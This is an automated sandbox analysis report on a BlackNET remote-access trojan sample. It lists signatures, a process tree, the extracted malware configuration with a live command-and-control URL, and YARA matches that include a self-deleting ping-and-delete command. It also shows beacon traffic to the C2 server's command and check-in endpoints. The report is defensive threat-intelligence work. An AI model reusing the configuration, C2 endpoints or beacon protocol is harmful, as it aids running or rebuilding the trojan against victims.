
Windows Analysis Report 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe

Overview

General Information

Sample Name: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Analysis ID: 471063
MD5: bc15770f9c1c0735cb5cc9d800476ab0
SHA1: 7700f53b4de7abcd0aa28a1989f73aad394b49bb
SHA256: 4054ee21cbfc210489f119c2d717ca1ae43129fc0d07aefe322fabb3b61d079f
Tags: BlackNET, exe

Detection

BlackNET
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected BlackNET
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
.NET source code contains potential unpacker
Uses ping.exe to sleep
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe (PID: 4804 cmdline: 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
    • cmd.exe (PID: 5936 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 7100 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
    • winhost.exe (PID: 6944 cmdline: 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
      • cmd.exe (PID: 7060 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 3028 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
    • cmd.exe (PID: 6036 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6752 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
    • winhost.exe (PID: 4112 cmdline: 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
      • cmd.exe (PID: 5580 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6492 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • winhost.exe (PID: 7000 cmdline: 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
    • cmd.exe (PID: 6984 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 5668 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • cleanup

Malware Configuration

Threatname: BlackNET

{"Host": "http://gpay-safe.ru/x/", "ID": "HaCk", "Starup Name": "a5b002eacf54590ec8401ff6d3f920ee", "Install Name": "winhost.exe", "Install Dir": "Temp ", "Delay": "1000", "Version": "v3.6.0 Public", "Network Seprator": "|BN|", "Mutex": "BN[vSqieqIW-9794388]"}

Yara Overview

Initial Sample

Source | Rule | Description | Author (matched strings listed below each row)
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | SUSP_Modified_SystemExeFileName_in_File | Detecst a variant of a system file name often used by attackers to cloak their activity | Florian Roth
  • 0x110c6:$s1: svchosts.exe
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | MAL_Winnti_Sample_May18_1 | Detects malware sample from Burning Umbrella report - Generic Winnti Rule | Florian Roth
  • 0xe740:$s1: wireshark
  • 0xe6f6:$s2: procexp
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | CN_disclosed_20180208_c | Detects malware from disclosed CN malware set | Florian Roth
  • 0xec42:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0xffc0:$s7: shutdown -r -t 00
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | HKTL_NET_GUID_BlackNET | Detects VB.NET red/black-team tools via typelibguid | Arnim Rupp
  • 0x125ff:$typelibguid0: c2b90883-abee-4cfa-af66-dfd93ec617a5
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | JoeSecurity_BlackNET | Yara detected BlackNET | Joe Security

Dropped Files

Source | Rule | Description | Author (matched strings listed below each row)
dropped/winhost.exe | SUSP_Modified_SystemExeFileName_in_File | Detecst a variant of a system file name often used by attackers to cloak their activity | Florian Roth
  • 0x110c6:$s1: svchosts.exe
dropped/winhost.exe | MAL_Winnti_Sample_May18_1 | Detects malware sample from Burning Umbrella report - Generic Winnti Rule | Florian Roth
  • 0xe740:$s1: wireshark
  • 0xe6f6:$s2: procexp
dropped/winhost.exe | CN_disclosed_20180208_c | Detects malware from disclosed CN malware set | Florian Roth
  • 0xec42:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0xffc0:$s7: shutdown -r -t 00
dropped/winhost.exe | HKTL_NET_GUID_BlackNET | Detects VB.NET red/black-team tools via typelibguid | Arnim Rupp
  • 0x125ff:$typelibguid0: c2b90883-abee-4cfa-af66-dfd93ec617a5
dropped/winhost.exe | JoeSecurity_BlackNET | Yara detected BlackNET | Joe Security

Memory Dumps

Source | Rule | Description | Author
00000008.00000002.674613084.0000000000722000.00000002.00020000.sdmp | JoeSecurity_BlackNET | Yara detected BlackNET | Joe Security
00000010.00000000.694369153.0000000000AE2000.00000002.00020000.sdmp | JoeSecurity_BlackNET | Yara detected BlackNET | Joe Security
0000000C.00000002.697281898.0000000000812000.00000002.00020000.sdmp | JoeSecurity_BlackNET | Yara detected BlackNET | Joe Security
00000013.00000002.718658230.0000000000162000.00000002.00020000.sdmp | JoeSecurity_BlackNET | Yara detected BlackNET | Joe Security
00000000.00000002.664262498.00000000009B2000.00000002.00020000.sdmp | JoeSecurity_BlackNET | Yara detected BlackNET | Joe Security
(5 of 15 entries shown)

Unpacked PEs

Source | Rule | Description | Author (matched strings listed below each row)
19.2.winhost.exe.160000.0.unpack | SUSP_Modified_SystemExeFileName_in_File | Detecst a variant of a system file name often used by attackers to cloak their activity | Florian Roth
  • 0x110c6:$s1: svchosts.exe
19.2.winhost.exe.160000.0.unpack | MAL_Winnti_Sample_May18_1 | Detects malware sample from Burning Umbrella report - Generic Winnti Rule | Florian Roth
  • 0xe740:$s1: wireshark
  • 0xe6f6:$s2: procexp
19.2.winhost.exe.160000.0.unpack | CN_disclosed_20180208_c | Detects malware from disclosed CN malware set | Florian Roth
  • 0xec42:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0xffc0:$s7: shutdown -r -t 00
19.2.winhost.exe.160000.0.unpack | HKTL_NET_GUID_BlackNET | Detects VB.NET red/black-team tools via typelibguid | Arnim Rupp
  • 0x125ff:$typelibguid0: c2b90883-abee-4cfa-af66-dfd93ec617a5
19.2.winhost.exe.160000.0.unpack | JoeSecurity_BlackNET | Yara detected BlackNET | Joe Security
(5 of 45 entries shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack | Malware Configuration Extractor: BlackNET {"Host": "http://gpay-safe.ru/x/", "ID": "HaCk", "Starup Name": "a5b002eacf54590ec8401ff6d3f920ee", "Install Name": "winhost.exe", "Install Dir": "Temp ", "Delay": "1000", "Version": "v3.6.0 Public", "Network Seprator": "|BN|", "Mutex": "BN[vSqieqIW-9794388]"}
Multi AV Scanner detection for submitted file
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Virustotal: Detection: 68%
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Metadefender: Detection: 52%
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | ReversingLabs: Detection: 85%
Antivirus / Scanner detection for submitted sample
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Avira: detected
Multi AV Scanner detection for domain / URL
Source: gpay-safe.ru | Virustotal: Detection: 6%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Metadefender: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | ReversingLabs: Detection: 85%
Machine Learning detection for sample
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Joe Sandbox ML: detected
Source: 19.0.winhost.exe.160000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 16.0.winhost.exe.ae0000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 8.0.winhost.exe.720000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File opened: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File opened: C:\Users\user\AppData\Local\Temp\Microsoft\
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File opened: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe:Zone.Identifier
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File opened: C:\Users\user\

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49724 -> 91.206.93.216:80
Source: Traffic | Snort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49725 -> 91.206.93.216:80
Source: Traffic | Snort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49726 -> 91.206.93.216:80
Source: Traffic | Snort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49727 -> 91.206.93.216:80
Source: Traffic | Snort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49730 -> 91.206.93.216:80
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://gpay-safe.ru/x/
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: ASBAXETNRU ASBAXETNRU
Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1 | Host: gpay-safe.ru | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1 | Host: gpay-safe.ru | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1 | Host: gpay-safe.ru | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1 | Host: gpay-safe.ru | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1 | Host: gpay-safe.ru | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 1.1.1.1 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 24 Aug 2021 22:49:10 GMT | Server: Apache/2.4.29 (Ubuntu) | Content-Length: 274 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.645343119.000000001BE94000.00000004.00000001.sdmp | String found in binary or memory: http://en.w
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.679709753.0000000002F6C000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.699597146.0000000002EA1000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp | String found in binary or memory: http://gpay-safe.ru
Source: winhost.exe, winhost.exe, 00000013.00000002.718658230.0000000000162000.00000002.00020000.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | String found in binary or memory: http://gpay-safe.ru/x/
Source: winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp | String found in binary or memory: http://gpay-safe.ru/x//getCommand.php?id=SGFDa182NUYxRDNBOQ
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.700029251.0000000002F20000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp | String found in binary or memory: http://gpay-safe.ru/x//getCommand.php?id=SGFDa182NUYxRDNBOQx
Source: winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp | String found in binary or memory: http://gpay-safe.ru/x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ
Source: winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp | String found in binary or memory: http://gpay-safe.ru/x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQx
Source: winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp | String found in binary or memory: http://gpay-safe.ru/x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ
Source: winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.700029251.0000000002F20000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp | String found in binary or memory: http://gpay-safe.ru/x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQx
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.646554695.000000001BECF000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.o
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.649141258.000000001BE94000.00000004.00000001.sdmp | String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlx
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.651883264.000000001BED7000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
